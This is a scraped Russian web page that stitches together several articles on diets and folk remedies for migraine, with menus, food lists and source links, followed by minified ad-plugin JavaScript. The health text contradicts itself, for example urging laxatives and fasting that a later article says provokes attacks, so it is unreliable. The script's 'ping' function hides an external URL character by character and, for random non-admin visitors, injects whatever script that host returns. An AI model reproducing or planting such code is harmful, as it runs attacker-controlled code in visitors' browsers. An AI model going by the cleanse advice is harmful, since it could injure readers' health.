Шестые и седьмые сутки являются сугубо «фруктовыми». Налегайте на пищу растительного происхождения, в том числе на зерновые и семечки. Дневной рацион обязательно должны составлять молочные продукты. Облегчает мигреневые состояния домашний мед. Не забывайте о смородине и белокочанной капусте. Прекрасно действует на сосуды зеленый чай, именно поэтому предпочтительно пить его как можно чаще.

Как похудеть на диете медиков

Народные рецепты от мигрени

Кроме лечебного питания, от головных болей помогают избавиться народные рецепты:

  1. Слегка отожмите кислую капусту, выложите овощ на марлю и поместите за уши и на височную область. Повяжите голову полотенцем.
  2. Если вы чувствуете, что причиной мигрени явилось умственное переутомление, можно попробовать съесть селедку.
  3. Разбейте в посуде свежее яйцо, влейте 200 мл горячего кипяченого молока, быстро перемешайте и выпейте залпом. Проводите процедуру несколько дней.
  4. Залейте 1 ст. л. цветков клевера 200 мл закипевшей очищенной воды, оставьте настояться в течение 1 часа. Процедите через мелкий дуршлаг. Пейте по 0,5 стакана трижды в день.
  5. Очистите от кожицы сырую картофелину и помойте под проточной водой. Поместите в соковыжималку или натрите на терке и собственноручно выдавите сок, используя кусочек марли. Полученный сок пейте по 0,25 стакана до 2 раз в сутки.

https://youtu.be/7zC-sj9Z7qI

Источник: http://dietyexpert.ru/pri-zabolevaniyax/dieta-pri-migreni-u-vzroslyx.html

Диета при мигрени у взрослых

Как правило, от мигрени периодически мучается каждый десятый человек на планете. Очень важно, периодически проводить профилактику, чтобы как можно быстрее избавиться от этого неприятного заболевания. Диета поможет очистить организм и перестроить его на новую форму питания. Со временем при строгом соблюдении разработанного рациона вы заметите, что мигрень стала беспокоить вас значительно реже.

Преимущества диеты

Используя в своем рационе определенные продукты, можно частично снизить степень проявления мигрени.

Это связано, прежде всего, с тем, что в составе некоторых продуктов присутствуют полезные добавки, которые расслабляют кровеносные сосуды.

При данной диете можно без ограничений есть большое количество различных продуктов. Овощи, молочные продукты, рыба и сухофрукты станут вашими надежными союзниками в борьбе с мигренью.

Противопоказания

Следует заранее обсудить использование данной диеты с врачом. Людям, которые страдают мигренью противопоказано употреблять ряд продуктов. Категорически запрещено есть продукты с содержанием глютамина натрия, а также уксус, маринады и консервы. Стоит отказаться от жирного мяса, майонеза, складного и копченостей. Снизить количество потребляемого сахара и сыра.

Основные правила

Начинать данное питание следует по специальной схеме. Вам нужно почистить свой организм от шлаков заранее, и подготовить его к смене рациона. Рекомендуют за 3 дня до начала диеты принять слабительное. Также следует регулярно делать физические нагрузки и дышать свежим воздухом в свободное время.

Правила, которые следует соблюдать во время диеты

  1. Выпивать не менее 2-х литров чистой воды.
  2. Первые два дня употреблять только соки из фруктов и овощей.
  3. Перед началом диеты соблюдать голодовку.
  4. Строго продолжать курс 7 дней.

Примерное меню на каждый день диеты

  • 1-й день:
  • Завтрак, 2-й завтрак, обед и ужин: сок (овощной/фруктовый);
  • 2-й день:
  • Завтрак, 2-й завтрак, обед и ужин: сок (овощной/фруктовый);
  • 3-й день:
  • Завтрак: сок (овощной/фруктовый);
  • 2-й завтрак: кефир, сок, 2 ст.л. овсянки или гречки;
  • Обед: суп из овощей, 2 ст.л. картофельного пюре, отвар шиповника;
  • Ужин: сок или простокваша.

4-й день:

  • Завтрак: 2 ст.л. каши, сок;
  • 2-й завтрак: горсть орехов;
  • Обед: суп из овощей, 2 ст.л. картофельного пюре, огурец, травяной отвар;
  • Ужин: ряженка, сок или кефир.

5-й день:

  • Завтрак: салат из овощей с ломтиком хлеба, 2 ст.л.ки каши, отвар шиповника;
  • 2-й завтрак: яблоко;
  • Обед: суп из овощей, 2 ст.л. каши, салат, отвар из трав;
  • Ужин: творог, салат, сок.

6-й день:

  • Завтрак: сок, фрукты;
  • 2-й завтрак: кефир, йогурт или ряженка;
  • Обед: салат, сок;
  • Ужин: салат, фрукты, орехи.

7-й день:

  • Завтрак: сок, фрукты;
  • 2-й завтрак: кефир, йогурт или ряженка;
  • Обед: салат, сок;
  • Ужин: салат, фрукты, орехи.

1147     1

Источник: https://fastdieta.ru/dieta-pri-migreni-u-vzroslyix

Диета при мигрени у взрослых: принципы питания, что нельзя есть, список полезных продуктов и примерное меню

Мигрень — одно из самых распространенных неврологических заболеваний, характеризующееся частыми головными болями и тошнотой. Смягчить симптомы, уменьшить частоту приступов и предотвратить их появление поможет специальная диета, назначенная врачом-неврологом.

  1. Общие принципы питания
  2. Вредные продукты
  3. Полезные продукты
  4. Пример меню

Общие принципы питания

Главный принцип питания при мигрени — исключение из рациона продуктов и веществ, негативно влияющих на сосуды головного мозга.

К ним относят пищу, содержащую:

  • кофеин;
  • тирамин;
  • гистамин;
  • глутамат натрия
  • нитраты.

Данные вещества расширяют или, наоборот, сужают сосуды, что влечет за собой возникновение мигренозного приступа.

Также к фактору, который провоцирует развитие заболевания, относят большие промежутки между приемами пищи и длительное голодание. Поэтому необходимо наладить режим питания, исключая долгие периоды между перекусами. Обязательно нужно есть не реже 3-4 раз в сутки.

Во время заболевания запрещается самостоятельно подбирать новые для себя продукты питания и резко менять привычный выбор блюд. Мигрень влияет на переносимость организмом веществ, и необычная пища может спровоцировать приступ.

Необходимо отказаться от полуфабрикатов и замороженного мяса. Курицу, индейку стоит покупать только домашнюю. Все блюда готовить самостоятельно.

Вредные продукты

Из рациона стоит исключить продукты, в большом количестве включающие вещества, расширяющие и сужающие сосуды, повышающие кровяное давление и вызывающие мигрень. К ним относятся:

  • Алкогольные напитки.
  • Сыр, особенно выдержанный.
  • Творожные продукты.
  • Острые и копченые колбасы.
  • Пепси и кока-кола.
  • Горох, фасоль, чечевица, орехи.
  • Вареные вкрутую яйца.
  • Любые полуфабрикаты.
  • Вяленое и копченое мясо.
  • Квас.
  • Кислая и соленая капуста.
  • Соя.
  • Соленая, вяленая, копченая рыба.
  • Шоколад и другие сладости.
  • Острые растения: чеснок, хрен, редис, лук.
  • Энергетические напитки.
  • Крепкий черный чай.

Список неполный, его составляет врач, исходя из индивидуальных особенностей организма пациента. У некоторых больных приступы вызывают одни продукты, другим они помогают предотвратить возникновение мигрени. Например, это относится к кофе и чаю. На первом этапе у многих порция данных напитков предотвращает приступ, другим же строго запрещена.

Полезные продукты

При частых мигренозных приступах необходимо повысить в организме уровень магния и снизить количество серотонина.  Для этого в рационе должны преобладать блюда из рыбы, овощей и фруктов.

К рекомендованным продуктам относят:

  • Каши: гречневая, рисовая, овсяная.
  • Семена льна.
  • Морскую рыбу.
  • Овощи зеленого цвета: огурцы, стручковая фасоль, брокколи.
  • Бананы.
  • Растительное масло: подсолнечное, соевое, льняное, оливковое, кукурузное.
  • Зеленый чай.
  • Финики.
  • Томатный сок.
  • Тыкву и дыню.
  • Мясо домашней курицы или индейки.
  • Обезжиренное молоко.
  • Персики, вишню и черешню.
  • Пшеничные отруби.
  • Мёд.
  • Груши и яблоки зеленого цвета.
  • Курагу, изюм и другие сушеные фрукты и ягоды.
  • Свежие анчоусы.

Гранат относят к самому полезному фрукту при мигрени. Его косточки помогают справляться с приступами головной боли, обеспечивая кровь необходимым количеством железа. Гранат также укрепляет стенки сосудов и выводит из организма токсины.

Одинаково полезно употреблять сок и косточки. В отличие от лекарственных препаратов, гранат рекомендован для беременных.

Иногда мигрень может быть вызвана аллергией на определенные пищевые продукты. В этом случае необходимо обратиться к врачу-аллергологу, который определит причину заболевания.

Пример меню

Рацион на неделю поможет составить врач. Примерное меню на день выглядит так:

  • Завтрак: обезжиренное молоко или любой свежевыжатый сок; творог или каша.
  • Обед: овощной суп или тушеные овощи.
  • Полдник: кефир и овсянка.
  • Ужин: салат, пюре или домашние куриные котлеты.
  • Перекусы: свежие фрукты.

Результатом диеты станет облегчение боли при приступах и уменьшение их частоты. Для полного выздоровления необходимо пройти курс лечения у невролога. Диета не сможет полностью избавить от заболевания. Самостоятельно подбирать рацион не рекомендуется, это может навредить организму и усилить приступы.

Источник: https://nevralgia.ru/golovnaya-bol/dieta-pri-migreni/

Ссылка на основную публикацию
var duplicateMode="undefined"!=typeof duplicateFlatPM&&duplicateFlatPM,untilscroll="undefined"!=typeof untilscrollFlatPM?untilscrollFlatPM:".flat_pm_end";function flatPM_sticky(e,a,t){var l=e,d=null,f=t=t||0;function n(){if(null==d){for(var e=getComputedStyle(l,""),t="",n=0;nflat_userVars.winwidth)&&(void 0!==o.html[s].group?flat_userVars.adb?(null==t["group_"+o.html[s].group]&&(t["group_"+o.html[s].group]=[]),t["group_"+o.html[s].group].push(""==o.html[s].snd&&duplicateMode?o.html[s].fst:o.html[s].snd)):(null==t["group_"+o.html[s].group]&&(t["group_"+o.html[s].group]=[]),t["group_"+o.html[s].group].push(o.html[s].fst)):flat_userVars.adb?t.push(""==o.html[s].snd&&duplicateMode?o.html[s].fst:o.html[s].snd):t.push(o.html[s].fst));for(r in t)e="object"==typeof t[r]?e+"\n"+t[r][flatPM_random(0,t[r].length-1)]:e+"\n"+t[r];if(""==(e=e.replace(//gm,"").replace(//gm,"").trim()))return void ff('[data-flat-id="'+o.ID+'"]').remove();if(void 0===o.how.simple&&void 0===o.how.onсe&&void 0===o.how.iterable||ff('[data-flat-id="'+o.ID+'"]').each(function(){-1!==e.indexOf("go"+"oglesyndication")||-1!==e.indexOf("viewBox")&&-1!==e.indexOf("svg")?ff(this).html(e):flatPM_setHTML(this,e)}),void 0!==o.how.popup&&(c="true"==o.how.popup.cross?void 0!==o.how.popup.timer&&"true"==o.how.popup.timer?'
Закрыть через '+o.how.popup.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}